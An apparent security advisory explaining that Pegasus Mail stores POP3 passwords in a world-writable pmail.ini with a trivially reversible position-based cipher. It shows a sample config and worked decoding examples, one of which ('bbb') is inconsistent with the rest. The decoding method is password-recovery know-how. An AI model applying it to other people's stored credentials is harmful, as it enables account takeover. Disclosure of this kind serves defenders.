|
Brought to you by:
Suppliers of:
|
|
|
| |
| Pegasus Mail uses a weak encryption algorithm to encrypt the password used for the logon process to the SMTP server. This algorithm has been successfully reverse-engineered, making password retrieval exceptionally simple. |
| |
Credit:
The algorithm was cracked by: galldor
|
| |
The POP3 Passwords are kept in the \mail\USER\pmail.ini. So 'c:\pmail\mail\g00f\pmail.ini' would give the user g00f's configuration file.
The file looks something like this:
[Pegasus Mail for Windows - built-in TCP/IP Mail]
Host where POP3 mail account is located = example.com
POP3 mail account (username on host) = g00f
V2 Password for POP3 mail account = $moL
Delete downloaded mail from host = Y
Largest message size to retrieve = 0
Directory to place incoming POP3 mail = C:\PMAIL\MAIL\g00f
Transport control word = 66308
SMTP relay host for outgoing mail = example.com
Search mask to locate outgoing messages = C:\PMAIL\MAIL\g00f\*.PMX
Alternative From: field for message = galldor@microhack.com
Since this text file is world read/writable, any user can easily edit the file to route messages to a new directory, or choose not to delete POP3 mail from host.
But the main problem is the weak encryption on the V2 Password.
The password is encrypted using a very weak encryption algorithm:
V2 encrypts so that there is the same amount of letters/numbers as the original password, and their position corresponds to their position in the plaintext password.
Cracking It:
First you have to Ignore the $ completely. The letters and numbers after the $ are the encrypted values of the password, so anything after the $ is also the size of the password. Here are a few examples of how to crack it and how the encryption works.
a = $m # Just testing....
aa = $mo
aaa = $moL
b = $R
bb = $R?
bbb = ?R?8
# As you can see the weak encryption is already showing as the encryption doesn't even encrypt by the number of letters.
# The Encryption works like this
1st Letter placement of a = m
2nd Letter placement of a = o
3rd Letter placement of a = L
Etc, etc.
So finding aab would be as followed:
aab = 1st a + 2nd a + 3rd b (which) = mo8 # so in the ini the pass will be $mo8
abb = 1st a + 2nd b + 3rd b = $m?8
So you could now find out:
bab = $Ro8
As Pegasus is a popular mail client on Windows Networks this could mean a serious security compromise, as most POP3 passwords are the same as the telnet/ssh etc. Older versions of Pegasus use the same kind of encryption.
|
|
|
|
|
